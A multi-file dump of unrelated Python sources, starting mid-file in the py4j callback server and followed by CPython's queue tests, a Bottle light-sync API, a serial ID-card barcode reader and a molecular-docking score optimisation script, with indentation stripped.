:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = weakref.WeakSet()
# Lock is used to isolate critical region like connection creation.
# Some code can produce exceptions when ran in parallel, but
# They will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe thread needs to be cleanup up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def get_listening_port(self):
"""Returns the port on which the callback server is listening to.
Different than `port` when port is 0.
"""
return self._listening_port
def get_listening_address(self):
"""Returns the address on which the callback server is listening to.
May be different than `address` if `address` was an alias (e.g.,
localhost).
"""
return self._listening_address
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
server_started.send(
self, server=self)
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [],
self.callback_server_parameters.accept_timeout)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
if self.callback_server_parameters.read_timeout:
socket_instance.settimeout(
self.callback_server_parameters.read_timeout)
if self.ssl_context:
socket_instance = self.ssl_context.wrap_socket(
socket_instance, server_side=True)
input = socket_instance.makefile("rb")
connection = self._create_connection(
socket_instance, input)
with self.lock:
if not self.is_shutdown:
self.connections.add(connection)
connection.start()
server_connection_started.send(
self, connection=connection)
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception as e:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
server_connection_error.send(
self, error=e)
logger.exception("Error while waiting for a connection.")
server_stopped.send(self, server=self)
def _create_connection(self, socket_instance, stream):
connection = CallbackConnection(
self.pool, stream, socket_instance, self.gateway_client,
self.callback_server_parameters, self)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
pre_server_shutdown.send(self, server=self)
with self.lock:
try:
if self.is_shutting_down:
# Do not allow calling shutdown while shutdown is
# executing. Alternative would be to not use a
# reentrant lock, but we
# would need to check all the other uses of this lock.
return
self.is_shutting_down = True
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
temp_connections = list(self.connections)
for connection in temp_connections:
connection.close()
self.pool.clear()
finally:
self.is_shutting_down = False
self.thread.join()
self.thread = None
post_server_shutdown.send(self, server=self)
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters, callback_server):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
# TODO Remove in 1.0. Take it from the callback_server directly
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# TODO Remove in 1.0. This should never be the case.
self.callback_server_parameters = CallbackServerParameters()
self.callback_server = callback_server
self.daemon = self.callback_server_parameters.daemonize_connections
def run(self):
logger.info("Callback Connection ready to receive messages")
reset = False
authenticated = self.callback_server_parameters.auth_token is None
try:
while True:
command = smart_decode(self.input.readline())[:-1]
if not authenticated:
token = self.callback_server_parameters.auth_token
# Will raise an exception if auth fails in any way.
authenticated = do_client_auth(
command, self.input, self.socket, token)
continue
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
_garbage_collect_proxy(self.pool, obj_id)
self.socket.sendall(
proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
else:
logger.error("Unknown command {0}".format(command))
# We're sending something to prevent blokincg, but at this
# point, the protocol is broken.
self.socket.sendall(
proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
except Py4JAuthenticationError:
reset = True
logger.exception("Could not authenticate connection.")
except socket.timeout:
reset = True
logger.info(
"Timeout while callback connection was waiting for"
"a message", exc_info=True)
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
self.close(reset)
def close(self, reset=False):
logger.info("Closing down callback connection")
if reset:
set_linger(self.socket)
else:
# Send shutdown before closing stream and socket
quiet_shutdown(self.socket)
quiet_close(self.input)
quiet_close(self.socket)
already_closed = self.socket is None
self.socket = None
self.input = None
if not already_closed:
server_connection_stopped.send(
self.callback_server, connection=self)
def _call_proxy(self, obj_id, input):
if obj_id not in self.pool:
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part('Object ID unknown', self.pool)
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return proto.RETURN_MESSAGE + proto.SUCCESS +\
get_command_part(return_value, self.pool)
except Exception as e:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
if self.callback_server_parameters.propagate_java_exceptions and\
isinstance(e, Py4JJavaError):
java_exception = e.java_exception
else:
java_exception = traceback.format_exc()
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part(java_exception, self.pool)
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object, force_id=None):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
if force_id:
id = force_id
else:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
test_queue.py
|
import queue
import time
import unittest
from test import support
threading = support.import_module('threading')
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
class BlockingTestMixin:
def tearDown(self):
self.t = None
def do_blocking_test(self, block_func, block_args, trigger_func,
trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10)
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
def do_exceptional_blocking_test(self, block_func, block_args,
trigger_func, trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail('expected exception of kind %r' %
expected_exception_class)
finally:
self.t.join(10)
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail('trigger thread ended but event never set')
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if q.qsize():
raise RuntimeError('Call this function with an empty queue')
self.assertTrue(q.empty())
self.assertFalse(q.full())
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue=[111, 333, 222], LifoQueue=[222, 333, 111
], PriorityQueue=[111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE - 1):
q.put(i)
self.assertTrue(q.qsize(), 'Queue should not be empty')
self.assertTrue(not qfull(q), 'Queue should not be full')
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), 'Queue should be full')
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except queue.Full:
pass
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except queue.Empty:
pass
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0, 1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
'q.join() did not block until all tasks were done')
for i in (0, 1):
q.put(-1)
q.join()
def test_queue_task_done(self):
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail('Did not detect task count going negative')
def test_queue_join(self):
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail('Did not detect task count going negative')
def test_simple_queue(self):
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2
with self.assertRaises(queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.Queue
class LifoQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.LifoQueue
class PriorityQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.PriorityQueue
class FailingQueueException(Exception):
pass
class FailingQueue(queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException('You Lose')
return queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException('You Lose')
return queue.Queue._get(self)
class FailingQueueTest(BlockingTestMixin, unittest.TestCase):
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError('Call this function with an empty queue')
for i in range(QUEUE_SIZE - 1):
q.put(i)
q.fail_next_put = True
try:
q.put('oops', block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put('oops', timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put('last')
self.assertTrue(qfull(q), 'Queue should be full')
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ('full',), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put('last')
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ('full', True, 10), q.
get, (), FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put('last')
self.assertTrue(qfull(q), 'Queue should be full')
q.get()
self.assertTrue(not qfull(q), 'Queue should not be full')
q.put('last')
self.assertTrue(qfull(q), 'Queue should be full')
self.do_blocking_test(q.put, ('full',), q.get, ())
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
q.put('first')
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), 'Queue should not be empty')
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), 'Queue should not be empty')
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), 'Queue should not be empty')
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
def test_failing_queue(self):
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
if __name__ == '__main__':
unittest.main()
|
run.py
|
import logging, json
from socket import timeout
from bottle import route, response, request, run
from mh_device import MagicHomeDevice
from workers import StoppableThread, sync_screen
sync_worker = StoppableThread(target=sync_screen, args=("light", 1))
@route('/api/state', method='GET')
def get_state():
status = "enabled" if sync_worker.is_alive() else "disabled"
message = { "status": status}
return json.dumps(message)
@route('/api/state', method='POST')
def set_state():
global sync_worker
data = json.loads(request.body.read())
message = { "status": "disabled" }
if data['status'] and sync_worker.is_alive() is False:
light_ip = data['light_ip']
light_type = data['light_type']
polling_interval = data['polling_interval']
try:
logging.info("Attempting to connect to Magic Home device")
light = MagicHomeDevice(ipaddr=light_ip, setup=light_type)
logging.info("Starting sync worker thread")
sync_worker = StoppableThread(
target=sync_screen,
args=(light, polling_interval))
sync_worker.start()
message["status"] = "enabled"
except timeout:
logging.warning("Could not to connect to Magic Home device")
response.status = 400
message["error"] = "Could not to connect to Magic Home device"
elif data['status'] is False and sync_worker.is_alive():
logging.info("Stopping sync worker thread")
sync_worker.stop()
sync_worker.join()
return json.dumps(message)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
try:
run(host='0.0.0.0', port=6006)
finally:
if sync_worker.is_alive():
sync_worker.stop()
sync_worker.join()
|
barcode_reader.py
|
import sys
import os
import json
import re
import threading
import lzstring
#import requests
import serial
from enum import Enum
from time import sleep
from datetime import datetime
from scripts.helpers import get_args, get_ports
from scripts.ymq import YPubNode
import base64
class Person:
def __init__(self, identification=None, name=None, last_name=None, gender=None, birth_date=None, blood_type=None,
extra_json=None, extra_txt=None, alert=None):
self.identification = identification
self.name = name
self.last_name = last_name
self.gender = gender
self.birth_date = birth_date
self.blood_type = blood_type
self.extra_json = extra_json
self.extra_txt = extra_txt
self.alert = alert
@staticmethod
def append_names(name1, name2):
names = [name1, name2]
return ' '.join(filter(None, names))
class BarcodeType(Enum):
QR = 0
CEDULA_COLOMBIA = 1
CEDULA_COSTA_RICA = 2
QR_DSD = 3
class BarcodeReader:
ports_allowlist = [44953]
KEYS_ARRAY_CR = [0x27, 0x30, 0x04, 0xA0, 0x00, 0x0F, 0x93, 0x12, 0xA0, 0xD1, 0x33, 0xE0, 0x03, 0xD0, 0x00, 0xDf,
0x00]
thread = None
initiated = False
args = None
def __init__(self, port=None, baudrate=115200, topic=""):
if port is None:
ports = get_ports()
for (com, desc, vid) in zip(ports[0], ports[1], ports[2]):
# print(com, desc, vid)
if vid in BarcodeReader.ports_allowlist:
port = com
if port is not None:
try:
self.serial = serial.Serial(port=port, baudrate=baudrate, timeout=0.5)
self.initiated = True
except Exception as e:
print(e)
self.args = get_args()
self.node = YPubNode(topic)
def __del__(self):
self.serial.close()
@staticmethod
def _decode_string_utf_8(values):
string_data = ''
for data in values:
if data != b'\x00':
string_data = string_data + data.decode('utf-8')
return string_data
@staticmethod
def _decode_string_iso_8859_1(values):
string_data = ''
for data in values:
if data != b'\x00':
string_data = string_data + data.decode('iso-8859-1')
return string_data
def get_reading(self):
if self.serial.in_waiting > 0:
msg = []
data_size = self.serial.in_waiting
for i in range(data_size):
value = self.serial.read()
msg.append(value)
# TODO improve code type detection to allow qr codes of length 531 and 700
if len(msg) == 531:
code_type = BarcodeType.CEDULA_COLOMBIA
elif len(msg) == 700:
code_type = BarcodeType.CEDULA_COSTA_RICA
else:
code_type = BarcodeType.QR
try:
data = None
if code_type == BarcodeType.CEDULA_COLOMBIA:
person = Person(
identification=self._decode_string_iso_8859_1(msg[48:58]).lstrip('0'),
name=Person.append_names(self._decode_string_iso_8859_1(msg[104:127]),
self._decode_string_iso_8859_1(msg[127:150])),
last_name=Person.append_names(self._decode_string_iso_8859_1(msg[58:81]),
self._decode_string_iso_8859_1(msg[81:104])),
gender=self._decode_string_iso_8859_1(msg[151:152]),
birth_date=self._decode_string_iso_8859_1(msg[152:156]) + '-' + self._decode_string_iso_8859_1(
msg[156:158]) + '-' + self._decode_string_iso_8859_1(msg[158:160]),
blood_type=self._decode_string_iso_8859_1(msg[166:169])
)
data = person.__dict__
elif code_type == BarcodeType.CEDULA_COSTA_RICA:
d = ""
j = 0
count = 0
for _value in msg:
if j == 17:
j = 0
# __value = int(_value)
c = self.KEYS_ARRAY_CR[j] ^ _value[0]
if re.match("^[a-zA-Z0-9]*$", chr(c)):
d = d + chr(c)
count = count + 1
else:
d += ' '
j = j + 1
person = Person(
identification=d[0:9].strip(),
name=d[61:91].strip(),
last_name=Person.append_names(d[9:35].strip(), d[35:61].strip()),
)
data = person.__dict__
elif code_type == BarcodeType.QR:
# This implementations expects QR codes in json format, encoded in base 64
base64_data = (''.join(self._decode_string_iso_8859_1(msg)))
print(base64_data)
decoded_data = base64.b64decode(base64_data).decode('utf-8')
try:
msg_json = json.loads(decoded_data)
except Exception as e:
print("Error. Not a valid json. error:", e)
person = Person(
name=msg_json["name"],
identification=msg_json["document"],
extra_txt=json.dumps(msg_json)
)
data = person.__dict__
if data is not None:
return {
'barcode_type': code_type.value,
'data': data,
'timestamp': datetime.now().isoformat()
}
except Exception as e:
print("Bardcode Error: ",e)
return
else:
sleep(0.1)
def _thread(self):
while True:
reading = self.get_reading()
if reading:
self.node.post(reading)
def start(self):
"""Start the background simulator thread if it isn't running yet."""
if self.thread is None:
# start background frame thread
self.thread = threading.Thread(target=self._thread)
self.thread.start()
|
analyzeAll_customDir.py
|
import cPickle
import sys
import numpy
import glob
import gzip
import copy
import sys
import threading
import Queue
import time
ligands = []
allScoreList = []
allScoreListDict = {}
#scoreDict = {}
#resultsDir = '../dockingResults/'
#resultsDir = '../dockingResults_20140816shapes_peelDock_fullRadius_normed/'
resultsDir = sys.argv[1]
def loadPickle(this_q, this_filename):
filePrefix = this_filename.replace(resultsDir+'/','').replace('.cPickle','')
fo = gzip.open(this_filename,'rb')
#this_scoreList = cPickle.load(fo)
data = fo.read()
this_scoreList = cPickle.loads(data)
fo.close()
this_q.put((filePrefix, this_scoreList))
#this_scoreList2 = copy.deepcopy(this_scoreList)
#this_q.put((filePrefix, this_scoreList, this_scoreList2))
q = Queue.Queue()
threadList = []
for filename in glob.glob('%s/results*' %(resultsDir))[:30]:
#for filename in glob.glob('%s/results*' %(resultsDir))[:200]:
print filename
#filePrefix = filename.replace(resultsDir,'').replace('.cPickle','')
#ligands.append(filePrefix)
t = threading.Thread(target=loadPickle, args=(q,filename))
t.daemon = True
t.start()
threadList.append(t)
#fo = gzip.open(filename,'rb')
#scoreList = cPickle.load(fo)
#fo.close()
c = 0
while sum([i.is_alive() for i in threadList]) != 0:
time.sleep(1)
c += 1
print 'waiting for threads %i sec:' %(c), [i.is_alive() for i in threadList]
while not q.empty():
prefix, scoreList = q.get()
ligands.append(prefix)
#print scoreList
#scoreList = q.get()
#allScoreListDict[prefix] = copy.deepcopy(scoreList)
allScoreListDict[prefix] = scoreList
allScoreList = allScoreList + scoreList
#for entry in allScoreList:
# scoreDict[(tuple(entry[0]), tuple(entry[1]),filePrefix)] = entry[2]
#allScoreList = numpy.array(allScoreList)
rotations = {}
translations = {}
for ligand in ligands:
rotations[ligand] = set([])
translations[ligand] = set([])
for row in allScoreListDict[ligand]:
translations[ligand].add(tuple(row[0]))
rotations[ligand].add(tuple(row[1]))
#for translation, rotation, ligand in scoreDict.keys():
# translations[ligand].add(translation)
# rotations[ligand].add(rotation)
#for key in scoreDict.keys():
# translations.add(tuple(key[0]))
# rotations.add(tuple(key[1]))
minRotation = {}
for ligand in ligands:
#minRotation[ligand] = sorted(list(rotations[ligand]), key=lambda x:abs(x[0]))[0]
minRotation[ligand] = sorted(list(rotations[ligand]), key=lambda x:abs(x[0]))[-1]
print minRotation
##Get normalization factors
numTerms = len(allScoreList[0][2])
means = [0.0 for i in range(numTerms)]
for score in allScoreList:
for i in range(numTerms):
means[i] += abs(score[2][i]) / len(allScoreList)
means = numpy.array(means)
#Avoid dividing by 0
means[means==0.0] = 1.
ligandMeans = {}
for ligand in ligands:
ligandMeans[ligand] = [0.0 for i in range(numTerms)]
for score in allScoreListDict[ligand]:
for i in range(numTerms):
#print abs(score[2][i]) / len(allScoreListDict[ligand])
ligandMeans[ligand][i] += abs(score[2][i]) / len(allScoreListDict[ligand])
ligandMeans[ligand] = numpy.array(ligandMeans[ligand])
#Avoid dividing by 0
ligandMeans[ligand][ligandMeans[ligand] == 0.0] = 1.
print ligandMeans
###This comes in handy when scoring later
template_scoreListDict = {}
scoreTermsDict = {}
for ligand in ligands:
template_scoreListDict[ligand] = numpy.zeros((len(rotations[ligand])*len(translations[ligand]), 8))
template_scoreListDict[ligand][:,0:3] = numpy.array([[i[0][0], i[0][1], i[0][2]] for i in allScoreListDict[ligand]])
template_scoreListDict[ligand][:,3:7] = numpy.array([[i[1][0], i[1][1], i[1][2], i[1][3]] for i in allScoreListDict[ligand]])
scoreTermsDict[ligand] = numpy.array([i[2] for i in allScoreListDict[ligand]]) / ligandMeans[ligand]
#def computeScore(scoreList, factors):
# return sum([scoreList[i]*factors[i]/means[i] for i in range(len(scoreList))])
'''
def getBestTranslations(factors):
this_bestScoreTransDict= {}
for translation in translations:
transScores = []
bestScore = -99999999
bestRot = []
for rotation in rotations:
key = (translation, rotation)
if computeScore(scoreDict[key], factors) > bestScore:
bestRot = key[1]
bestScore = computeScore(scoreDict[key], factors)
this_bestScoreTransDict[(tuple(translation), tuple(bestRot))] = [scoreDict[(translation,bestRot)], factors]
this_bestScoreTransList = numpy.array([[key[0][0],
key[0][1],
key[0][2],
computeScore(scoreDict[key], factors)]
for key in this_bestScoreTransDict.keys()])
this_bestScoreTransList = numpy.array(sorted(this_bestScoreTransList, key=lambda x: x[3]))
return this_bestScoreTransList
'''
def scoreAll(factors):
# this_scoreListDict = {}
# for ligand in ligands:
# this_scoreListDict[ligand] = numpy.zeros((len(translations[ligand])*len(rotations[ligand]), 8))
# c=0
# for translation in translations[ligand]:
# for rotation in rotations[ligand]:
# this_scoreListDict[ligand][c] = numpy.array([translation[0], translation[1], translation[2], rotation[0], rotation[1], rotation[2], rotation[3], computeScore(scoreDict[(translation, rotation, ligand)], factors)])
# c += 1
# this_scoreListDict[ligand] = numpy.array(sorted(this_scoreListDict[ligand], key=lambda x:x[2]))
#this_scoreListDict = {}
this_scoreListDict = copy.deepcopy(template_scoreListDict)
for ligand in ligands:
#print len(rotations[ligand]), len(translations[ligand])
this_scoreListDict[ligand][:,7] = scoreTermsDict[ligand].dot(factors)
#, axis = 0, order = (7))
#this_scoreListDict[ligand] = numpy.array(sorted(this_scoreListDict[ligand], key=lambda x: x[7], reverse=True))
#print this_scoreListDict[ligand][:3]
return this_scoreListDict
def rankFactors(factors):
#This function takes a list of weighting factors and returns the rank that 0,0,0 gets when using them as multipliers on the score terms
#this_bestScoreTransList = getBestTranslations(factors)
print factors
this_scoreListDict = scoreAll(factors)
print 'scored!'
ranks = []
for ligand in ligands:
if 1:
a=this_scoreListDict[ligand]
#tripleZRows = numpy.logical_and(a[:,0]==0
tripleZScore = a[(a[:,0]==0) &
(a[:,1]==0) &
(a[:,2]==0) &
(a[:,3]==minRotation[ligand][0]) &
(a[:,4]==minRotation[ligand][1]) &
(a[:,5]==minRotation[ligand][2]) &
(a[:,6]==minRotation[ligand][3]),7]
rank = numpy.count_nonzero(this_scoreListDict[ligand][:,7]>tripleZScore)
ranks.append(rank)
else:
#this_scoreListDict[ligand] = this_scoreListDict[ligand][this_scoreListDict[ligand][:,7].argsort()][::-1]
for i, row in enumerate(this_scoreListDict[ligand]):
#print row
if row[0] == 0. and row[1] == 0. and row[2] == 0.:
if row[3] == minRotation[ligand][0] and row[4] == minRotation[ligand][1] and row[5] == minRotation[ligand][2] and row[6] == minRotation[ligand][3]:
#print row
#ranks.append(i)
tripleZScore = row[7]
rank = numpy.count_nonzero(this_scoreListDict[ligand][:,7]>tripleZScore)
ranks.append(rank)
break
print sum(ranks)
return sum(ranks)
#for i, row in enumerate(this_bestScoreTransList):
# if (row[:3] == numpy.array([0,0,0])).all():
# triple0 = i
#return -triple0
'''
def scoreFactors(factors):
#This function takes a list of weighting factors and returns a "score" that they get when using them as multipliers on the score terms
this_bestScoreTransList = getBestTranslations(factors)
runningScore = 0.0
for i, row in enumerate(this_bestScoreTransList):
#runningScore += (numpy.sqrt((row[0]**2) + (row[1]**2) + (row[2]**2))**8) * i
runningScore += (0.03 + -numpy.exp(-(numpy.sqrt((row[0]**2) + (row[1]**2) + (row[2]**2))**2)/2)) * i
#runningScore += (0.03 + -numpy.exp(-(numpy.sqrt((row[0]**2) + (row[1]**2) + (row[2]**2))**2)/5)) * row[3]
return runningScore
'''
def print_parameters(x):
print x
import scipy.optimize
###Just as a reminder
#my_score_functions =['hydrophobic_A * hydrophobic_B',
# 2 'hydrophilic_A * hydrophilic_B',
# 3 'hydrophilic_A * hydrophobic_B',
# 4 'hydrophobic_A * hydrophilic_B',
# 5 'hbondDonor_A * hbondAcceptor_B',
# 6 'hbondAcceptor_A * hbondDonor_B',
# 7 'hbondAcceptor_A * hbondAcceptor_B',
# 8 'hbondDonor_A * hbondDonor_B',
# 9 'aromatic_A * aromatic_B',
# 10 'occupancy_A * occupancy_B',
# 11 'adjacency_A * occupancy_B',
# 12 'occupancy_A * adjacency_B',
# 13 'adjacency_A * adjacency_B']
## Put in human-inputted factors
#user_factors = [5., 5., -5., -5., 5.,
# 5., 0., 0., 5., -15.,
# 5., 5., 0.]
user_factors = [0., 0., -0., -0., 0.,
0., 0., 0., 0., -00.,
0., 0., 0.]
my_optimization = scipy.optimize.minimize(rankFactors, #scoreFactors,
user_factors,
#method = 'COBYLA',
options={'disp':True,
#'factor':0.1},
#'m':100,
'eps': 2.},
#'rhobeg':1},
# 'pgtol':1},
#bounds = ((0,20),(0,20),(-10,10),
# (-10,10),(5,5),(5,5),
# (-10,10),(-10,10),(0,10),
# (-100,-10),(-20,20),(-20,20),
# (-20,20))
bounds = ((0,200),(0,200),(-100,100),
(-100,100),(0,100),(0,100),
(-100,100),(-100,100),(0,100),
(-500,-10),(-200,200),(-200,200),
(-200,200))
)
print 'OPTIMIZATION STATS:', my_optimization
optimizedFactors = my_optimization.x
'''
my_optimization = scipy.optimize.fmin(rankFactors,user_factors, xtol = 0.01)
optimizedFactors = my_optimization
'''
'''
